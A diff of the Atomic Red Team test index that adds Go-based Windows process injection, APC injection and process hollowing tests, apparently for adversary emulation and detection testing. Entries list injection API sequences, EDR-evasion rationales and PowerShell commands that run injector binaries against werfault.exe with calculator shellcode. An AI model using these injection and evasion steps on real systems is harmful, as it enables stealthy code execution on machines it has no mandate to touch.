+  - Atomic Test #12: Process Injection with Go using CreateThread WinAPI (Natively) [windows]
 - T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
   - Atomic Test #1: Shortcut Modification [windows]
@@ -641,6 +659,8 @@
   - Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
 - [T1055.004 Process Injection: Asynchronous Procedure Call](../../T1055.004/T1055.004.md)
   - Atomic Test #1: Process Injection via C# [windows]
+  - Atomic Test #2: EarlyBird APC Queue Injection in Go [windows]
+  - Atomic Test #3: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI [windows]
 - [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
   - Atomic Test #1: Create registry persistence via AppCert DLL [windows]
 - T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -700,6 +720,8 @@
 - [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
   - Atomic Test #1: Process Hollowing using PowerShell [windows]
   - Atomic Test #2: RunPE via VBA [windows]
+  - Atomic Test #3: Process Hollowing in Go using CreateProcessW WinAPI [windows]
+  - Atomic Test #4: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012) [windows]
 - T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546 Event Triggered Execution](../../T1546/T1546.md)
   - Atomic Test #1: Persistence with Custom AutodialDLL [windows]
@@ -803,6 +825,7 @@
   - Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
   - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
   - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
+  - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1072 Software Deployment Tools](../../T1072/T1072.md)

atomics/Indexes/index.yaml

@@ -8454,6 +8454,192 @@ defense-evasion:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1205:
     technique:
       modified: '2022-10-19T23:08:40.603Z'
@@ -15708,6 +15894,60 @@ defense-evasion:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1647:
     technique:
       x_mitre_platforms:
@@ -20685,6 +20925,60 @@ defense-evasion:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1564.009:
     technique:
       x_mitre_platforms:
@@ -34115,6 +34409,192 @@ privilege-escalation:
           Stop-Process -Force
         name: powershell
         elevation_required: true
+    - name: Process Injection with Go using UuidFromStringA WinAPI
+      auto_generated_guid: 2315ce15-38b6-46ac-a3eb-5e21abef2545
+      description: "Uses WinAPI UuidFromStringA to load shellcode to a memory address
+        then executes the shellcode using EnumSystemLocalesA.\nWith this technique,
+        memory is allocated on the heap and does not use commonly suspicious APIs
+        such as VirtualAlloc, WriteProcessMemory, or CreateThread \n- PoC Credit:
+        (https://github.com/Ne0nd0g/go-shellcode/tree/master#uuidfromstringa)\n- References:
+        \n  - https://research.nccgroup.com/2021/01/23/rift-analysing-a-lazarus-shellcode-execution-method/\n
+        \ - https://twitter.com/_CPResearch_/status/1352310521752662018\n  - https://blog.securehat.co.uk/process-injection/shellcode-execution-via-enumsystemlocala\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\UuidFromStringA.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using EtwpCreateEtwThread WinAPI
+      auto_generated_guid: 7362ecef-6461-402e-8716-7410e1566400
+      description: "Uses EtwpCreateEtwThread function from ntdll.dll to execute shellcode
+        within the application's process.\nThis program loads the DLLs and gets a
+        handle to the used procedures itself instead of using the windows package
+        directly.\n\nSteps taken with this technique\n1. Allocate memory for the shellcode
+        with VirtualAlloc setting the page permissions to Read/Write\n2. Use the RtlCopyMemory
+        macro to copy the shellcode to the allocated memory space\n3. Change the memory
+        page permissions to Execute/Read with VirtualProtect\n4. Call EtwpCreateEtwThread
+        on shellcode address\n5. Call WaitForSingleObject so the program does not
+        end before the shellcode is executed\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#EtwpCreateEtwThread)\n-
+        References: \n  - https://gist.github.com/TheWover/b2b2e427d3a81659942f4e8b9a978dc3\n
+        \ - https://www.geoffchappell.com/studies/windows/win32/ntdll/api/etw/index.htm\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\EtwpCreateEtwThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Remote Process Injection with Go using RtlCreateUserThread WinAPI
+      auto_generated_guid: a0c1725f-abcd-40d6-baac-020f3cf94ecd
+      description: "Executes shellcode in a remote process.\n\nSteps taken with this
+        technique\n1. Get a handle to the target process\n2. Allocate memory for the
+        shellcode with VirtualAllocEx setting the page permissions to Read/Write\n3.
+        Use the WriteProcessMemory to copy the shellcode to the allocated memory space
+        in the remote process\n4. Change the memory page permissions to Execute/Read
+        with VirtualProtectEx\n5. Execute the entrypoint of the shellcode in the remote
+        process with RtlCreateUserThread\n6. Close the handle to the remote process\n\n-
+        PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References: \n  - https://www.cobaltstrike.com/blog/cobalt-strikes-process-injection-the-details-cobalt-strike\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\RtlCreateUserThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI
+      auto_generated_guid: 69534efc-d5f5-4550-89e6-12c6457b9edd
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellocde in a remote process.
+
+        This application leverages functions from the golang.org/x/sys/windows package, where feasible, like the windows.OpenProcess().
+
+        Steps taken with this technique
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethread)
+         - References:
+          - https://www.ired.team/offensive-security/code-injection-process-injection/process-injection
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThread.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using CreateRemoteThread WinAPI (Natively)
+      auto_generated_guid: 2a4ab5c1-97ad-4d6d-b5d3-13f3a6c94e39
+      description: |
+        Leverages the Windows CreateRemoteThread function from Kernel32.dll to execute shellcode in a remote process.
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        1. Get a handle to the target process
+        2. Allocate memory for the shellcode with VirtualAllocEx setting the page permissions to Read/Write
+        3. Use the WriteProcessMemory to copy the shellcode to the allocated memory space in the remote process
+        4. Change the memory page permissions to Execute/Read with VirtualProtectEx
+        5. Execute the entrypoint of the shellcode in the remote process with CreateRemoteThread
+        6. Close the handle to the remote process
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createremotethreadnative)
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process spawned
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: |
+          $process = Start-Process #{spawn_process_path} -passthru
+          $PathToAtomicsFolder\T1055\bin\x64\CreateRemoteThreadNative.exe -pid $process.Id -debug
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name #{spawn_process_name} -ErrorAction SilentlyContinue
+    - name: Process Injection with Go using CreateThread WinAPI
+      auto_generated_guid: 2871ed59-3837-4a52-9107-99500ebc87cb
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program leverages the functions from golang.org/x/sys/windows to call Windows procedures instead of manually loading them
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthread)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThread.exe -debug\n"
+        cleanup_command: 'Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+
+          '
+    - name: Process Injection with Go using CreateThread WinAPI (Natively)
+      auto_generated_guid: 2a3c7035-d14f-467a-af94-933e49fe6786
+      description: |
+        This program executes shellcode in the current process using the following steps
+        1. Allocate memory for the shellcode with VirtualAlloc setting the page permissions to Read/Write
+        2. Use the RtlCopyMemory macro to copy the shellcode to the allocated memory space
+        3. Change the memory page permissions to Execute/Read with VirtualProtect
+        4. Call CreateThread on shellcode address
+        5. Call WaitForSingleObject so the program does not end before the shellcode is executed
+
+        This program loads the DLLs and gets a handle to the used procedures itself instead of using the windows package directly.
+
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createthreadnative)
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055\\bin\\x64\\CreateThreadNative.exe -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1611:
     technique:
       modified: '2023-04-15T16:21:04.265Z'
@@ -37099,6 +37579,60 @@ privilege-escalation:
 
           '
         name: command_prompt
+    - name: EarlyBird APC Queue Injection in Go
+      auto_generated_guid: 73785dd2-323b-4205-ab16-bb6f06677e14
+      description: "Creates a process in a suspended state and calls QueueUserAPC
+        WinAPI to add a UserAPC to the child process that points to allocated shellcode.
+        \nResumeThread is called which then calls NtTestAlert to execute the created
+        UserAPC which then executes the shellcode.\nThis technique allows for the
+        early execution of shellcode and potentially before AV/EDR can hook functions
+        to support detection.\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)\n-
+        References: \n  - https://www.bleepingcomputer.com/news/security/early-bird-code-injection-technique-helps-malware-stay-undetected/\n
+        \ - https://www.ired.team/offensive-security/code-injection-process-injection/early-bird-apc-queue-code-injection\n"
+      supported_platforms:
+      - windows
+      input_arguments:
+        spawn_process_path:
+          description: Path of the binary to spawn
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        spawn_process_name:
+          description: Name of the process to spawn
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.004\bin\x64\EarlyBird.exe -program "#{spawn_process_path}"
+          -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{spawn_process_name}" -ErrorAction SilentlyContinue
+    - name: Remote Process Injection with Go using NtQueueApcThreadEx WinAPI
+      auto_generated_guid: 4cc571b1-f450-414a-850f-879baf36aa06
+      description: "Uses the undocumented NtQueueAPCThreadEx WinAPI to create a \"Special
+        User APC\" in the current thread of the current process to execute shellcode.
+        \nSince the shellcode is loaded and executed in the current process it is
+        considered local shellcode execution.\n\nSteps taken with this technique\n1.
+        Allocate memory for the shellcode with VirtualAlloc setting the page permissions
+        to Read/Write\n2. Use the RtlCopyMemory macro to copy the shellcode to the
+        allocated memory space\n3. Change the memory page permissions to Execute/Read
+        with VirtualProtect\n4. Get a handle to the current thread\n5. Execute the
+        shellcode in the current thread by creating a Special User APC through the
+        NtQueueApcThreadEx function\n\n- PoC Credit: (https://github.com/Ne0nd0g/go-shellcode/tree/master#rtlcreateuserthread)\n-
+        References:\n  - https://repnz.github.io/posts/apc/user-apc/\n  - https://docs.rs/ntapi/0.3.1/ntapi/ntpsapi/fn.NtQueueApcThreadEx.html\n
+        \ - https://0x00sec.org/t/process-injection-apc-injection/24608\n  - https://twitter.com/aionescu/status/992264290924032005\n
+        \ - http://www.opening-windows.com/techart_windows_vista_apc_internals2.htm#_Toc229652505\n"
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: "$PathToAtomicsFolder\\T1055.004\\bin\\x64\\NtQueueApcThreadEx.exe
+          -debug\n"
+        cleanup_command: Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
   T1546.009:
     technique:
       x_mitre_platforms:
@@ -41361,6 +41895,60 @@ privilege-escalation:
           -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\"
           -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n"
         name: powershell
+    - name: Process Hollowing in Go using CreateProcessW WinAPI
+      auto_generated_guid: c8f98fe1-c89b-4c49-a7e3-d60ee4bc2f5a
+      description: |
+        Creates a process in a suspended state, executes shellcode to spawn calc.exe in a child process, and then resumes the original process.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocess)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcess.exe -program
+          "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
+    - name: Process Hollowing in Go using CreateProcessW and CreatePipe WinAPIs (T1055.012)
+      auto_generated_guid: 94903cc5-d462-498a-b919-b1e5ab155fee
+      description: |
+        Create a process in a suspended state, execute shellcode to spawn calc.exe in a child process, and then resume the original process.
+        This test uses the CreatePipe function to create an anonymous pipe that parent and child processes can communicate over. This anonymous pipe
+        allows for the retrieval of output generated from executed shellcode.
+        - PoC Credit: (https://github.com/Ne0nd0g/go-shellcode#createprocesswithpipe)
+      supported_platforms:
+      - windows
+      input_arguments:
+        hollow_binary_path:
+          description: Path of the binary to hollow
+          type: string
+          default: C:\Windows\System32\werfault.exe
+        hollow_process_name:
+          description: Name of the process to hollow
+          type: string
+          default: werfault
+      executor:
+        name: powershell
+        elevation_required: false
+        command: '$PathToAtomicsFolder\T1055.012\bin\x64\CreateProcessWithPipe.exe
+          -program "#{hollow_binary_path}" -debug
+
+          '
+        cleanup_command: |-
+          Stop-Process -Name CalculatorApp -ErrorAction SilentlyContinue
+          Stop-Process -Name "#{hollow_process_name}" -ErrorAction SilentlyContinue
   T1068:
     technique:
       modified: '2023-04-07T17:13:54.168Z'
